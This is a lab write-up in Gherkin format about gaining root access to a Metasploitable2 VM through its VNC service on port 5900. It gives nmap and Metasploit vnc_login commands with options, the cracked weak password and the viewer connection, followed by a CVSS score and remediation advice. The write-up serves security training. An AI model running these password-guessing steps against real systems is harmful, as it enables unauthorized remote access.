## Version 1.4.1
## language: en

Feature:
  TOE:
    metasploitable2
  Category:
    weak password
  Location:
    192.168.0.11:5900 TCP
  CWE:
    CWE-521: Weak Password Requirements
  Rule:
    REQ.133: Passwords with at least 20 characters
  Goal:
    Get access to mestasploitable remotely
  Recommendation:
    Monitor port 5900, activate firewalls and give access only to trusted users

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | Ubuntu mate     | 18.04       |
    | Firefox Quantum | 65.0(64-bit)|
    | nmap            | 7.60        |
    | metasploit      | 5.0.9       |
    | xtightvncviewer | 1.3.10      |
  TOE information:
    Given I am running Metasploitable 2 on VM VirtualBox
    And Apache version is 2.2.8
    And PHP version 5.2.4
    And is running on Metasploitable 2 with kernel 2.6.24

  Scenario:
  Remote connection using the vnc service
    Given The port 5900 of metasploitable2 is open
    Then I can connect to mestaploitable from another machine
    And The ip from metasploitable2 is:
    """
    192.168.0.11
    """
    And Using the following command to get access
    """
    $xtightvncviewer 192.168.0.11
    """
    And To start the service i need a password

  Scenario: Static detection
  No code available for this vulnerability

  Scenario: Dynamic detection
  The port of service vnc is open
    Given I use nmap to scan the service of metasploitable2
    And I use the following command
    """
    $ nmap -Pn -sS -T4 192.168.0.11 -sS -sV -p5900
    """
    Then I get the output:
    """
    PORT     STATE  SERVICE VERSION
    5900/tcp open   vnc
    """
    Then The application to allows remote connection

  Scenario: Exploitation
  Using a module of metasploit to get the password
    Given I created a dictionary with possible passwords
    And I search exploits from metasploit to vnc service
    """
    msf>search vnc
    """
    Then I use the following module
    """
    $ auxiliary/scanner/vnc/vnc_login
    """
    And I set options
    """
    set RHOSTS 192.168.0.11
    set USERPASS_FILE /home/diana/Documentos/pass.txt
    """
    Then I get the pass to the service
    """
    password
    """
    And I use this pass to connect remotely using the ip from Metasploitable
    """
    $xtightvncviewer 192.168.0.11
    """
    Then I get access to the machine as root[evidence](desktop.png)

  Scenario: Remediation
  No code available for this vulnerability

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    8.9/10 (High) - AV:N/AC:H/PR:N/UI:N/S:C/C:L/I:H/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.1/10 (High) - E:F/RL:W/RC:R/
  Environmental: Unique and relevant attributes to a specific user environment
    8.2/10 (High) - CR:H/IR:H/AR:H

  Scenario: Correlations
    No correlations have been found to this date 2019-02-25